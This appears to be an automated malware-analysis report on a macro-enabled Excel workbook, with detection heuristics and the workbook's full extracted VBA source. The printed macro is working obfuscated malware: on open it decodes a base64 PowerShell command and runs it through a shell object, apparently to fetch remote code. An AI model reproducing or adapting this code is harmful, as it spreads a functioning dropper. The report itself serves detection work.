MALICIOUS
110
Risk Score
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set znxndI4iX_Utuv6EIH6NAJ2zKRjgv7IahO1EH_TIZfYFHTKSe67WDXlq_7aKjXuak4Jf5z7Zwuwe__s1EOBy9vVInJUJRHjB_8gMHqXn9hiRjF48Oi_TV5bwiA1_euFpKu_vNdtZ1XzaMDkgPV = CreateObject(E1MZ6WxUUXB3rdwQA153jpUYM1s31Ec9hYiatSuFULeAZdxqjVzi5xuZfwLDo5cO5CVQ4VhrEwiWJS9_BBTfN3CsnG45Fr) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub workbook_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9419 bytes |
SHA-256: 9d1a5442f8eb94cb6df9b622bf5c93650dc260ed3ba3de173d09e402904e29ab |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
36 of 67 identifiers look randomly generated (e.g. 'uJnmUQL_PsO9HBNIbbI2jp_fczqdGekisu_UseDu') — consistent with name-mangling obfuscation. Carved artifact contains 8 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
XNcMI4Wrf7bufOaejqP.DtY86_OpdNKw__e_Gbgw9D
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "XNcMI4Wrf7bufOaejqP"
Sub DtY86_OpdNKw__e_Gbgw9D()
dsfdsia = 12
Mo = vb__(165) & vb__(143) & vb__(134) & vb__(98) & vb__(113) & vb__(165) & vb__(98) & vb__(146) & vb__(177) & vb__(160) & vb__(153) & vb__(160) & vb__(167) & vb__(180) & vb__(149) & vb__(160) & vb__(138) & vb__(135) & vb__(160) & vb__(174) & vb__(142) & vb__(98) & vb__(111) & vb__(167) & vb__(98)
Dim aFdnIauro3p_UXaHlepxKvVN4x3iuQSsMHTPp As Date
Dim ooDRzuOLk4wGyxUryo_OtTgM5Wj7vLDJczzA_35j8rN8_o As Date
Dim BdF8LOdEMr3nKQe5YfgwJttb_3MT8cdEjcnuKN
Dim adWfRpfZASFzVdKRZWzno98S75tJPB_hdQ5EjP3YoCxg4 As Date
Dim gbXqQ1GE9bfCiW6TH9NiV_iEsHcb9lIaYDYPvk_MZWRdjgsgbS3yRUfb As Date
Dim Hou4ok_XhX_gIyR_R_pLRAIG_MwCtot_JuXIYw_z_fp5M5SOPbT_fB
Dim R7GXpFXQDod7phiNAH9vDfKa69prTHDh7Wd As Date
Dim mlx_P4Kf1Miv_UkPKgoxvurbqaq75k5_QC6 As Date
Mo = Mo & "WwBzAFkAcwB0AEUAbQAuAFQARQB4AHQALgBFAE4AQwBvAEQASQBOAEcAXQA6ADoAVQBuAEkAYwBvAGQARQAuAGcAZQBUAFMAdAByAGkATgBHACgAWwBzAFkAUwBUAGUAbQAuAEMAbwBOAFYARQByAFQAXQA6ADoARgByAG8ATQBiAGEAcwBFADYANABzAHQAcgBJAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBNAEEAQQB3AEEARABBAEEATwB3AEEAZwBBAEMAUQBBAGEAUQBBAHIAQQBDAHMAQQBLAFEAQQBnAEEASABzAEEASgBBAEIAcABBAEMAdwBBAEkAZwBCAGcAQQBHADQAQQBJAGcAQgA5AEEASAAwAEEARABRAEEASwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEYASQBBAFEAUQBCAEsAQQBEAGsAQQBZAHcAQgBJAEEARgBrAEEAWgB3AEIAaQB"
Dim nKXt229TLWL3Vt11ARirz4WDxMNkPQies As Date
Dim X7_vwu5vbdDcgSMCt4stUEsxT3ooYC4xs As Date
Mo = Mo & "BAEcAYwBBAFgAdwBCAEYAQQBGADgAQQBkAHcAQgBUAEEARgBJAEEAZQBRAEIAdgBBAEUAOABBAGEAUQBCAGwAQQBEAEkAQQBTAGcAQgBLAEEARQBjAEEAUgBRAEIAcABBAEgAVQBBAFUAdwBCAEwAQQBFAFUAQQBTAHcAQgA1AEEARABnAEEAZAB3AEIARgBBAEcATQBBAFIAUQBCAG4AQQBHAFEAQQBYAHcAQQAwAEEASABZAEEAVwBBAEIAUQBBAEMAQQBBAEsAQQBBAGcAQQBDAFEAQQBRAGcAQgBSAEEARQA0AEEAYgB3AEIAVQBBAEYASQBBAGQAZwBCAEIAQQBIAEkAQQBXAFEAQQBnAEEAQwB3AEEASQBBAEEAawBBAEYAbwBBAGUAZwBCAGYAQQBEAEUAQQBWAHcAQgBxAEEARwAwAEEAVABRAEIAUQBBAEYAbwBBAGQAdwBCAFEAQQBIAFUAQQBPAFEAQgBOAEEASABnAEEASQBBAEEAcABBAEgAcwBBAEkAQQBCAEoAQQBHADAAQQBVAEEAQgBQAEEASABJAEEAVgBBAEEAdABBAEUAMABBAFQAdwBCAGsAQQBGAFUAQQBUAEEAQgBGAEEAQwBBAEEAUQBnAEIAcABBAEgAUQBBAFUAdwBCAFUAQQBGAEkAQQBRAFEAQgB1AEEARgBNAEEAUgBnAEIARgBBAEgASQBBAE8AdwBBAE4AQQBBAG"
Dim K7_vDLfm4XZRlQ3_ghWy_VRNOc3FQWYiN_TVbPosKFarRfs As Date
Dim l_n2eh97yogglRXTg9zCz7hhP3onn4l6__RVoe4AOver5tCYvv3ra As Date
Mo = Mo & "8AQQBVAHcAQgBVAEEARQBFAEEAYwBnAEIAVQBBAEMAMABBAFkAZwBCAEoAQQBGAFEAQQBjAHcAQgAwAEEARgBJAEEAUQBRAEIAdQBBAEgATQBBAFIAZwBCAGwAQQBIAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAVgBBAEYASQBBAFEAdwBCAGwAQQBDAEEAQQBKAEEAQgBDAEEARgBFAEEAVABnAEIAdgBBAEYAUQBBAFUAZwBCADIAQQBFAEUAQQBjAGcAQgBaAEEAQwBBAEEATABRAEIAawBBAEUAVQBBAFUAdwBCAFUAQQBFAGsAQQBiAGcAQgBoAEEASABRAEEAUwBRAEIAUABBAEUANABBAEkAQQBBAGsAQQBGAG8AQQBlAGcAQgBmAEEARABFAEEAVgB3AEIAcQBBAEcAMABBAFQAUQBCAFEAQQBGAG8AQQBkAHcAQgBRAEEASABVAEEATwBRAEIATgBBAEgAZwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEARgBvAEEAZQBnAEIAZgBBAEQARQBBAFYAdwBCAHEAQQBHADAAQQBUAFEAQgBRAEEARgBvAEEAZAB3AEIAUQBBAEgAVQBBAE8AUQBCAE4AQQBIAGcAQQBPAHcAQQBnAEEASAAwAEEAZABBAEIAeQBBAEgAawBBAGUAdwBBAE4AQQBBAG8AQQBEAFEAQQBLAEEAQwBRAEEAV"
Dim b1oLElk2US4Cjvz_BqB_ywCczlhzOzzA3eQ2nIi As Date
Dim SG4djnV5KY_EzmkowKVdD_ndb3HDf8V1GHu As Date
Mo = Mo & "wBRAEIASgBBAEcATQBBAGMAZwBCAHYAQQBIAEEAQQBUAHcAQgBUAEEARQB3AEEATgBnAEIAWQBBAEUAZwBBAE0AUQBCAEkAQQBGAFUAQQBaAFEAQgBZAEEARwBzAEEAZQBRAEEAegBBAEgARQBBAE4AZwBCAHgAQQBGAGMAQQBSAGcAQgBMAEEARAAwAEEASgBBAEIAbABBAEUANABBAGQAZwBBADYAQQBIAFEAQQBSAFEAQgB0AEEASABBAEEASwB3AEEAbgBBAEYAdwBBAFkAZwBCAFAAQQBEAFEAQQBVAFEAQgBJAEEARQBNAEEAUQBnAEEANABBAEcAMABBAFIAdwBCAGgAQQBGAEUAQQBVAEEAQQAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBTAEEARQBFAEEAUwBnAEEANQBBAEcATQBBAFMAQQBCAFoAQQBHAGMAQQBZAGcAQgBuAEEARgA4AEEAUgBRAEIAZgBBAEgAYwBBAFUAdwBCAFMAQQBIAGsAQQBiAHcAQgBQAEEARwBrAEEAWgBRAEEAeQBBAEUAbwBBAFMAZwBCAEgAQQBFAFUAQQBhAFEAQgAxAEEARgBNAEEAUwB3AEIARgBBAEUAcwBBAGUAUQBBADQAQQBIAGMAQQBSAFEAQgBqAEEARQBVAEEAWgB3AEIAawBBAEYAOABBAE4AQQBC"
Dim s2j2LOloy__IQ4mDbwDxjdaBpeQZMC28 As Date
Dim sz2uNRHNb_wYrtzI234DCTKMbhMs7KavKub As Date
Mo = Mo & "ADIAQQBGAGcAQQBVAEEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYwBBAEIAbABBAEgAZwBBAFoAZwBCAHMAQQBHAEUAQQBjAHcAQgBvAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEwAdwBCAGwAQQBIAE0AQQBZAHcAQgBoAEEASABBAEEAWgBRAEEAdgBBAEUAYwBBAGMAZwBCAGgAQQBHAE0AQQBhAFEAQgBoAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBXAFEAQgBKAEEARwBNAEEAYwBnAEIAdgBBAEgAQQBBAFQAdwBCAFQAQQBFAHcAQQBOAGcAQgBZAEEARQBnAEEATQBRAEIASQBBAEYAVQBBAFoAUQBCAFkAQQBHAHMAQQBlAFEAQQB6AEEASABFAEEATgBnAEIAeABBAEYAYwBBAFIAZwBCAEwAQQBEAHMAQQBEAFEAQQBLAEEARgBJAEEAUQBRAEIASwBBAEQAawBBAFkAdwBCAEkAQQBGAGsAQQBaAHcAQgBpAEEARwBjAEEAWAB3AEIARgBBAEYAOABBAGQAdwBCAFQAQQBGAEkAQQBlAFEAQgB2AEEARQA4AEEAYQBRAEIAbABBAEQASQBBAFMAZwBCAEsAQQBFAGMAQQBSAFEAQgBwAEE"
Dim aAzyHoyVdqAU6nGhSGx5XooTr_aPPo_L4QZGBD_ZM7rhZKPDyoFoWyD As Date
Dim vWgHDMiEypxZpM9fOWYsZ6F4ewVamgUxDLm_e5rKoz11kulyyH1Q8GnzOmn As Date
Mo = Mo & "ASABVAEEAVQB3AEIATABBAEUAVQBBAFMAdwBCADUAQQBEAGcAQQBkAHcAQgBGAEEARwBNAEEAUgBRAEIAbgBBAEcAUQBBAFgAdwBBADAAQQBIAFkAQQBXAEEAQgBRAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBIAE0AQQBPAGcAQQB2AEEAQwA4AEEAWQBRAEIAdwBBAEcAVQBBAGUAQQBCAG0AQQBHAHcAQQBZAFEAQgB6AEEARwBnAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHYAQQBHAFUAQQBjAHcAQgBqAEEARwBFAEEAYwBBAEIAbABBAEMAOABBAFIAdwBCAHkAQQBHAEUAQQBZAHcAQgBwAEEARwBFAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBDAEEAQQBKAEEAQgBaAEEARQBrAEEAWQB3AEIAeQBBAEcAOABBAGMAQQBCAFAAQQBGAE0AQQBUAEEAQQAyAEEARgBnAEEAUwBBAEEAeABBAEUAZwBBAFYAUQBCAGwAQQBGAGcAQQBhAHcAQgA1AEEARABNAEEAYwBRAEEAMgBBAEgARQBBAFYAdwBCAEcAQQBFAHMAQQBPAHcAQQBOAEEAQQBvAEEAVQBnAEIAQgBBAEUAbwBBAE8AUQBCAGoAQQBFAGcAQQBXAFEAQgBuAEEARwBJAEEAWgB3AEIAZgBBAEUAVQ"
Dim OzGdSS_UbkN_SpLCj_OSsKgkdoDy6jue2QbUgWhhjaINlHhmu_D__R As Date
Dim CTg_oOJY2xtFBMzgKgrtQBQ8UEbCze_ek As Date
Mo = Mo & "BBAFgAdwBCADMAQQBGAE0AQQBVAGcAQgA1AEEARwA4AEEAVAB3AEIAcABBAEcAVQBBAE0AZwBCAEsAQQBFAG8AQQBSAHcAQgBGAEEARwBrAEEAZABRAEIAVABBAEUAcwBBAFIAUQBCAEwAQQBIAGsAQQBPAEEAQgAzAEEARQBVAEEAWQB3AEIARgBBAEcAYwBBAFoAQQBCAGYAQQBEAFEAQQBkAGcAQgBZAEEARgBBAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBjAHcAQQA2AEEAQwA4AEEATAB3AEIAaABBAEgAQQBBAFoAUQBCADQAQQBHAFkAQQBiAEEAQgBoAEEASABNAEEAYQBBAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBaAFEAQgB6AEEARwBNAEEAWQBRAEIAdwBBAEcAVQBBAEwAdwBCAEgAQQBIAEkAQQBZAFEAQgBqAEEARwBrAEEAWQBRAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQBrAEEARgBrAEEAUwBRAEIAagBBAEgASQBBAGIAdwBCAHcAQQBFADgAQQBVAHcAQgBNAEEARABZAEEAVwBBAEIASQBBAEQARQBBAFMAQQBCAFYAQQBHAFUAQQBXAEEAQgByAEEASABrAEEATQB3AEIAeABBAEQAWQBBAGMAUQBCAFgAQQBFAFkAQQBTA"
Dim VXA9W2QYBPZ2AfX4i1MRio_BiphwFhWwMfpxygxoYTN_ As Date
Dim zESkCGRnvLAsW8asTdQe3mpeyj_ABj2NY As Date
Mo = Mo & "HcAQQA3AEEAQQAwAEEAQwBnAEEATgBBAEEAbwBBAGYAUQBBAE4AQQBBAG8AQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAD0AIgApACkAfABJAGUAWAA="
Dim OKbU7_9N_AAe7a1EFS5B_1NZw_cCQkLSvRGv8VVtRPHlo_ As Date
Dim GM44O7KpW6AhMQ56HwrsoR_G_6L_dsnuv1TyWq6Vkn_y As Date
On Error Resume Next
xcv = "kdjkgkporet sghpogbkofpg"
bYtOEVFh_LxIbGOYOKxbBmk7_A_noubljXUHn4MmmePGr_b4cN2sEppyxuN_Vd38_LjCuE_T8LygV = Mo
uJnmUQL_PsO9HBNIbbI2jp_fczqdGekisu_UseDu1_epQ3TYgOlAqxtFJFHdktn_GrPWQ2b7WX_yJTNifP712i12BnIkUkJHEtgjm7 (bYtOEVFh_LxIbGOYOKxbBmk7_A_noubljXUHn4MmmePGr_b4cN2sEppyxuN_Vd38_LjCuE_T8LygV)
End Sub
Function uJnmUQL_PsO9HBNIbbI2jp_fczqdGekisu_UseDu1_epQ3TYgOlAqxtFJFHdktn_GrPWQ2b7WX_yJTNifP712i12BnIkUkJHEtgjm7(hn7pg4AiOoCHubKXcGetFBDEchxkJKSs_g4mTCrYLjq7qZbRxuoZNi_ei1L8EZXCUUGNhiCYa_fgUFYC_f_Xg2db_YDczsS As String)
ofo9diigdfsr = 43
E1MZ6WxUUXB3rdwQA153jpUYM1s31Ec9hYiatSuFULeAZdxqjVzi5xuZfwLDo5cO5CVQ4VhrEwiWJS9_BBTfN3CsnG45Fr = vb__(153) & vb__(149) & vb__(133) & vb__(180) & vb__(171) & vb__(178) & vb__(150) & vb__(112) & vb__(181) & vb__(138) & vb__(135) & vb__(174) & vb__(142)
Set znxndI4iX_Utuv6EIH6NAJ2zKRjgv7IahO1EH_TIZfYFHTKSe67WDXlq_7aKjXuak4Jf5z7Zwuwe__s1EOBy9vVInJUJRHjB_8gMHqXn9hiRjF48Oi_TV5bwiA1_euFpKu_vNdtZ1XzaMDkgPV = CreateObject(E1MZ6WxUUXB3rdwQA153jpUYM1s31Ec9hYiatSuFULeAZdxqjVzi5xuZfwLDo5cO5CVQ4VhrEwiWJS9_BBTfN3CsnG45Fr)
yGoI_XLqfSQCxNviaylOFoN3SE8_LsXmhHIPkINePUR8mmGGofPM_x = 9 - 9
vbcbnfgh = "nvbcvnhj bvcvnghjh nbcvfdhfg"
FowooRx35z2k7Su_2jxWUoszmuL1tavo5iHSDM3jDGrSs_n1WTz = znxndI4iX_Utuv6EIH6NAJ2zKRjgv7IahO1EH_TIZfYFHTKSe67WDXlq_7aKjXuak4Jf5z7Zwuwe__s1EOBy9vVInJUJRHjB_8gMHqXn9hiRjF48Oi_TV5bwiA1_euFpKu_vNdtZ1XzaMDkgPV.Run(hn7pg4AiOoCHubKXcGetFBDEchxkJKSs_g4mTCrYLjq7qZbRxuoZNi_ei1L8EZXCUUGNhiCYa_fgUFYC_f_Xg2db_YDczsS, yGoI_XLqfSQCxNviaylOFoN3SE8_LsXmhHIPkINePUR8mmGGofPM_x)
End Function
Function vb__(df As Integer)
vb__ = Chr(df - 66)
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 29696 bytes |
SHA-256: 20d6e848d68599335c82a74aff7c67ee8a394b6a6a859aca783de11fe46b027c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 8 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.